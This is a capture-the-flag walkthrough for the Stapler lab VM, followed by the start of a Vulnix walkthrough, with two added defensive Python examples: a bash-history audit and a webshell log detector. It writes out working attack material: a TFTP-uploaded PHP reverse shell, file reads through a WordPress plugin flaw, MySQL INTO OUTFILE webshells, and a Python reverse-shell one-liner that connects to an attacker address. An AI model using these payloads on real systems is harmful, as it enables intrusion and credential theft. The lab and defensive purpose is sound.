
VM 26 - Stapler

Walkthru

  • https://github.com/Hamza-Megahed/CTFs/blob/master/stapler/README
  • https://www.vulnhub.com/entry/stapler-1,150/...long list of walkthru



===
1.       Port scan shows many ports open:
a.       TCP: ftp, http, ssh, domain, netbios-ssn, doom, mysql, 12380, etc.
b.       UDP: tftp, dns, etc.
2.       Surfing to the website on port 80 didn't show much, and neither did dirb or nikto.
3.       Uploaded a test file using tftp and accessed it via http://ip/newlyuploadedfile.php without any problem, so created a PHP reverse shell file and accessed it via HTTP, which gave shell access as the www user.
4.       Wget'd linuxprivchecker. Found shares and was able to connect to them using smbclient without a password.
5.       Looked around and saw many user folders under /home.
6.       Spawned a TTY shell using [python -c 'import pty; pty.spawn("/bin/sh")'], which allows more commands to work. Use ls -laR | more to see the contents of all the folders.
7.       Found ".sudo_as_admin_successful" under peter, which was a hint, but nothing in his history file. The history file under the JKanode folder actually had peter's password. Use that password and sudo su, use [id] to check user access, switch to root and change the root password.
$ find . -name '.bash_history' -exec cat {} \;
Searches the directory and its subdirectories and prints all bash history files.
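Step 7 works because a history file was readable by another account and recorded a password on the command line. As an added example (not part of the original notes), the Python audit below checks a home tree for exactly those two conditions: history files readable by group or others, and history lines that carry a credential. The home tree it scans is constructed in a temporary directory; the usernames and passwords in it are placeholders, and the pattern list is an assumption to extend for your environment.

```python
"""Audit .bash_history files under a home tree for two risks: histories
readable by other users, and histories that record credentials on the
command line.  Added example, not part of the original notes; the home
tree it builds is constructed for the demo."""
import os
import re
import stat
import tempfile

# Command shapes that commonly put a secret on the command line
# (assumed starting list; extend for the tools used in your environment)
SECRET_PATTERNS = [
    re.compile(r"\bsshpass\s+-p\s*\S+"),
    re.compile(r"\bmysql\b.*\s-p\S+"),
    re.compile(r"\b(passw(or)?d|pwd)\s*[=:]\s*\S+", re.I),
    re.compile(r"\becho\s+\S+\s*\|\s*sudo\s+-S\b"),
]

def audit_history(home_root):
    """Walk home_root and return a list of findings, one dict per issue."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        hist = os.path.join(home_root, user, ".bash_history")
        if not os.path.isfile(hist):
            continue
        mode = os.stat(hist).st_mode
        # Readable by group or others: any local account can harvest it
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            findings.append({"user": user, "issue": "readable-by-others",
                             "detail": oct(stat.S_IMODE(mode))})
        with open(hist, errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                if any(p.search(line) for p in SECRET_PATTERNS):
                    findings.append({"user": user, "issue": "secret-in-history",
                                     "detail": f"line {lineno}"})
    return findings

def build_demo_home():
    """Create a constructed /home-like tree so the audit runs offline."""
    root = tempfile.mkdtemp(prefix="home_demo_")
    samples = {
        # constructed: secret on the command line, world-readable file
        "jkanode": ("ls -la\nsshpass -p 'Not-A-Real-Pwd' ssh peter@localhost\n", 0o644),
        # constructed: clean history, owner-only
        "peter": ("cd /tmp\nls\n", 0o600),
        # constructed: mysql password inline, owner-only
        "zoe": ("mysql -u root -pexample-only\n", 0o600),
    }
    for user, (content, mode) in samples.items():
        user_dir = os.path.join(root, user)
        os.makedirs(user_dir)
        path = os.path.join(user_dir, ".bash_history")
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    for finding in audit_history(build_demo_home()):
        print(f"{finding['user']:10s} {finding['issue']:20s} {finding['detail']}")
```

Run it against a real system by passing /home to audit_history; the fix for each finding is chmod 600 on the file and rewriting any command that takes a password as an argument to read it from a prompt or a protected file instead.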
8.       There's something running on 12380, so on a hunch I checked that in the browser too. An nmap detail scan identifies it as Apache httpd 2.4.18, and running nikto on that port reveals a new WordPress site. It shows robots.txt, which led to the /blogblog/ site. Tried SQL injection, which didn't work. Looked in the blog and found plugins had been installed recently. Looked further in searchsploit and found an Advanced Video plugin vulnerability.
10.    Changed the IP address, added the port and the blogblog name. Also used /etc/passwd instead of FILEPATH.
a.       (screenshot not captured)

b.       When the URL is accessed, it creates a new blog post with a picture. Looked at the page source of the post and downloaded the picture using wget (use the --no-check-certificate parameter to disable the HTTPS cert warning), and cat'ing it gave the contents of /etc/passwd. Now you have users. The delimiter is : and the first field is the username:
$ cat 123.jpeg | grep /bin/bash | cut -d ":" -f1
11.   Now we have a user list; we need passwords. Using the HTTPS link above, try to access the wp-config.php file: replace /etc/passwd with wp-config.php. Similarly it will generate a JPEG that you can download using wget and cat to see the content. Here you will see the DB user/password. Tried hydra with the user list from the previous JPEG and the password from the new JPEG and got in as the zoe user. Logged in with zoe, looked into the other users' home folders and found the sudo_as_admin_successful file under peter and peter's password under JKanode's.
12.   Searchsploit told us there is an exploit for WordPress Advanced Video, but when I edited the link and ran it, it gave a cert mismatch warning [SSL: CERTIFICATE_VERIFY_FAILED], so I modified the exploit script. When you run the script no output is shown, but the blog post is created.
13.   After the file is downloaded you have the DB user/password. Log into the DB and create a webshell.
a.  mysql> select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/sh.php';
               Query OK, 1 row affected (0.03 sec)
b.  curl -k -s https://$ip:12380/blogblog/wp-content/uploads/sh.php?c=uname+-a, or use the browser, but nothing comes back with c: the shell reads $_GET['cmd'], so the parameter has to be cmd (none of the meterpreter stuff works with c either). With cmd the output is:
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
c.  Create a meterpreter payload and start the multi handler.
d.  Use the webshell to download and execute the meterpreter payload.
e.  Once on the machine, look around in all the user folders.

14.    You can inject a PHP shell here:
mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
15.   Then you can use it, which will show output in the browser.
16.   Now on the Kali machine:
$ nc -lvp 80
17.   And from the PHP shell append the following to the URL. If you have nc listening, this gets you a shell:
?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.190.1",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
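Every step from 13 to 17 leaves the same trace in the web server's access log: a request for a .php file under wp-content/uploads, a query parameter named cmd (or the mistyped c), and a payload that decodes to a shell one-liner. As an added example for detection (not part of the original notes), the Python below classifies Apache log lines on those three signals. The log lines are constructed, the client IP is a documentation-range placeholder, and the parameter names and payload markers are assumptions you would tune to your own environment.

```python
"""Detection over web-server access logs for the webshell pattern in
steps 13-17: PHP served from wp-content/uploads (which should hold only
static files) and command parameters carrying shell payloads.  Added
example, not part of the original notes; the log lines are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined/common log format: client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Executable scripts under the uploads tree should never be requested
UPLOAD_PHP = re.compile(r"/wp-content/uploads/.*\.php\b", re.I)
# Parameter names webshells in this write-up read ($_GET['cmd'], the 'c' typo)
CMD_PARAMS = {"cmd", "c", "exec", "command"}
# Fragments typical of the reverse-shell one-liners seen in the walkthrough
SHELL_MARKERS = ("/bin/sh", "/bin/bash", "socket.socket", "os.dup2",
                 "subprocess", "bash -i", "nc -e")

def classify(line):
    """Return the reasons a single log line is suspicious ([] means clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    parts = urlsplit(m.group("target"))
    reasons = []
    if UPLOAD_PHP.search(parts.path):
        reasons.append("php-under-uploads")
    names = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
    hit = sorted(names & CMD_PARAMS)
    if hit:
        reasons.append("command-param:" + ",".join(hit))
        # decode once so percent-encoded payloads are matched too
        if any(marker in unquote(parts.query) for marker in SHELL_MARKERS):
            reasons.append("shell-payload")
    return reasons

def scan(log_text):
    """Return [(line_number, reasons)] for every suspicious line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        reasons = classify(line)
        if reasons:
            hits.append((n, reasons))
    return hits

# Constructed sample log; 203.0.113.5 is a documentation-range placeholder
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2020:10:00:01 +0000] "GET /blogblog/ HTTP/1.1" 200 5123
203.0.113.5 - - [10/Jan/2020:10:00:07 +0000] "GET /blogblog/wp-content/uploads/2016/06/photo.jpg HTTP/1.1" 200 84011
203.0.113.5 - - [10/Jan/2020:10:00:19 +0000] "GET /blogblog/wp-content/uploads/shell.php?cmd=id HTTP/1.1" 200 54
203.0.113.5 - - [10/Jan/2020:10:00:31 +0000] "GET /blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket()%3Bos.dup2(s.fileno()%2C0)%27 HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(reasons)}")
```

Two hardening points follow directly from what the walkthrough did: serve wp-content/uploads with PHP execution disabled so a dropped .php file is never run, and give the WordPress database account no FILE privilege (and set MySQL's secure_file_priv) so SELECT ... INTO OUTFILE cannot write into the web root in the first place.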


Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...